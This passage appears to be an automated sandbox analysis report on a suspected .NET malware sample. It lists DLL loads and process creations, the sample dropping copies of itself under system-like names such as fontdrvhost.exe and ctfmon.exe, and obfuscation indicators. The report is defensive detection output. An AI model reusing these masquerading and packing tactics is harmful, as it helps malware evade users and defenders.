                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: mscoree.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: apphelp.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: version.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: wldp.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: profapi.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: version.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: uxtheme.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: wldp.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: profapi.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\5b884080fd4f94Jump to behavior
                            Source: LzmJLVB41K.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: LzmJLVB41K.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: LzmJLVB41K.exeStatic file information: File size 1998336 > 1048576
                            Source: LzmJLVB41K.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1e7600
                            Source: LzmJLVB41K.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: :C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.pdb source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000036D9000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: :C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.pdb source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000036D9000.00000004.00000800.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: LzmJLVB41K.exe, BsRfmRdfV3IS2HGBuC2.cs.Net Code: Type.GetTypeFromHandle(Alushx29ZpQi3KArJrn.k9fAuiBq2NK(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Alushx29ZpQi3KArJrn.k9fAuiBq2NK(16777245)),Type.GetTypeFromHandle(Alushx29ZpQi3KArJrn.k9fAuiBq2NK(16777259))})
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline"
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline"
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 0_2_00007FFD348C53B2 pushad ; ret 0_2_00007FFD348C53B5
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 0_2_00007FFD34CB755D push ebx; iretd 0_2_00007FFD34CB756A
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeCode function: 8_2_00007FFD348B53B2 pushad ; ret 8_2_00007FFD348B53B5
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeCode function: 9_2_00007FFD348953B2 pushad ; ret 9_2_00007FFD348953B5
                            Source: C:\Recovery\ctfmon.exeCode function: 22_2_00007FFD348853B2 pushad ; ret 22_2_00007FFD348853B5
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 32_2_00007FFD348853B2 pushad ; ret 32_2_00007FFD348853B5
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 32_2_00007FFD34898F68 push edx; retf 32_2_00007FFD34898F6D
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeCode function: 51_2_00007FFD348A53B2 pushad ; ret 51_2_00007FFD348A53B5
                            Source: C:\Recovery\ctfmon.exeCode function: 54_2_00007FFD348A53B2 pushad ; ret 54_2_00007FFD348A53B5
                            Source: C:\Recovery\ctfmon.exeCode function: 54_2_00007FFD348B8F68 push edx; retf 54_2_00007FFD348B8F6D
                            Source: LzmJLVB41K.exeStatic PE information: section name: .text entropy: 7.564809337686255
                            Source: fontdrvhost.exe.0.drStatic PE information: section name: .text entropy: 7.564809337686255
                            Source: fozAQGvSmfTQIywuzSgk.exe.0.drStatic PE information: section name: .text entropy: 7.564809337686255
                            Source: ctfmon.exe.0.drStatic PE information: section name: .text entropy: 7.564809337686255
                            Source: fozAQGvSmfTQIywuzSgk.exe0.0.drStatic PE information: section name: .text entropy: 7.564809337686255
                            Source: LzmJLVB41K.exe, voJVM2MpBGCvru4CNpv.csHigh entropy of concatenated method names: 'SbobefTYQxfGEZ7ukL4X', 'Js1PjcTYPL4oSZ1QOpDH', 'C4N9FNTYcABN4PpaJBIm', 'cdjFwFTYuB6RfU31BHvX', 's4WhO6TYl9OdQDfLyIpl', 'method_0', 'method_1', 'GJvMf0OKYB', 'aRpMkNQWQr', 'YRjMyR9Jkb'
                            Source: LzmJLVB41K.exe, cGQhe5HojjBqex8eRaD.csHigh entropy of concatenated method names: 'zTOHOpOUFL', 'FoyHXm1IfX', 'iMWH0qrebo', 'B3HH9Y40bS', 'nNmHst6f9b', 'POYHpPt7ah', 'H7WHCLmpf0', 'Os3HfUAusM', 'pMYHkvUrfG', 'pOfHyZWKko'
                            Source: LzmJLVB41K.exe, mGoDWjadko5qLvZXsi5.csHigh entropy of concatenated method names: 'YQua2EUaan', 'AWtaLgKp7U', 'tQRazZkL2r', 'IK4iSCt5AN', 'sNpiTSa8bY', 'CcTiAgNCFC', 'CHpi7Ccuy9', 'j3IiReYKx1', 'sBBiuOFHkJ', 'XCLilWY4JO'
                            Source: LzmJLVB41K.exe, xUdYXoGcAJR7SFBMuyM.csHigh entropy of concatenated method names: 'g2xGVUsCI0', 'rjoS2RT4Qh1oVANNDS43', 'eXOOVCT4uCc3krIxND2t', 'cdQ1o5T4lPKn0D5mZeLC', 'UV1vYJT4PVSTEidqhDJx', 'nms1CYT4cDDdvl9HCq16', 'IPy', 'method_0', 'method_1', 'method_2'
                            Source: LzmJLVB41K.exe, blf0pplVQFf0ERo4bZ4.csHigh entropy of concatenated method names: 'rOrlOHL6Zn', 'z4951mT1gMI9txsRpfdi', 'tJyRjuT1KWnUvnFmDg0V', 'rYF5BhT1NO2sRl25Wbnd', 'E94', 'P9X', 'vmethod_0', 'RiYTREUyJTk', 'YQiTPc37u39', 'imethod_0'
                            Source: LzmJLVB41K.exe, LwCJpwTkGgLvfWPLPjd.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'V4hTQzJjKAy', 'wN6TRThxbul', 'aaJk9pT8qRcDcUqr28ly', 'cDIePXT8IurFMSZ1iFTN'
                            Source: LzmJLVB41K.exe, RxsQ17PocHtIqWj4332.csHigh entropy of concatenated method names: 'IIDPXDXsY5', 'jbjP0RAGXu', 'XnlP9adS4N', 'OtnQgtTjsh5rvTUlvlm4', 'dA1i93Tjp8YymBBdyTkq', 'MeN62pTj0K3g1XdpqO9y', 'BYvCBrTj9Ri3Ba5GbJ3W', 'cyo5mITjCn5LM7Fes67J', 'h8cbHOTjfcN9Vo3y5CTK', 'INI9AHTjkv3601iNBB4U'
                            Source: LzmJLVB41K.exe, Ac7iQV5Jtl2bbtF9WtW.csHigh entropy of concatenated method names: 'ruw5mUrHse', 'ov853hkTcC', 'eXi56x5U1C', 'ovEAZXTwMRUZW2TAGQ4M', 'KxrlJ3TwqG3LqwXU1Fu6', 'QhHSNFTwIGbS6EmXg02o', 'YRok8KTwHAYbRKCJTan2', 'VxsSJXTwVdBmRjAA7snt', 'J0u9u4TwBV9gY3SxZ3qy', 'ogk29lTwtlJ30jmaT9l3'
                            Source: LzmJLVB41K.exe, tdSbcZlj5BMQm30eU9S.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'VfKTPo5FoXx', 'wN6TRThxbul', 'j9x3RIT1a8X0BiwQ4one', 'A57gTjT1ih0S7dF2a4y5', 'LWeXcjT1raxu2WFatJ6O'
                            Source: LzmJLVB41K.exe, rPwVyPQrpGTl6LDscYo.csHigh entropy of concatenated method names: 'aHIQU178Eh', 'rwCQdhIqbj', 'smMmJBTjS1adJyU6lUsy', 'S9ColKTWLw08CnOnVOk8', 'pn5DUaTWzKWQyU0pDMmn', 'l2xICBTjTqNINUvAuI0V', 'dP4QbmHZDU', 'aCtQvL8091', 'dXhQJBGb7F', 'v49QwZJoms'
                            Source: LzmJLVB41K.exe, gdFIA7TLWOAeeig7ONG.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'aRoTPTVNtr7', 'wN6TRThxbul', 'QXvfB0T8LumyhhXnJIlm', 'kCVvDTT8zBV6DwDFdhib', 'AomJ6gT5ST7TY8t3Ycd6', 'ANP7n9T5T9d8kZAirSu3'
                            Source: LzmJLVB41K.exe, Jb8vPA2aYoo5QSy05Ha.csHigh entropy of concatenated method names: 'B2cTl1Eom68', 'p0ATlW1qagq', 'g1STljJXjkj', 'SKxTlgGNVqQ', 'jGQTlKkqqsN', 's0UTlNmDHew', 'gl0TlGGPbbL', 'RPDLunwKFO', 'hd7TlaeuAEw', 'iQ4Tlip9Eam'
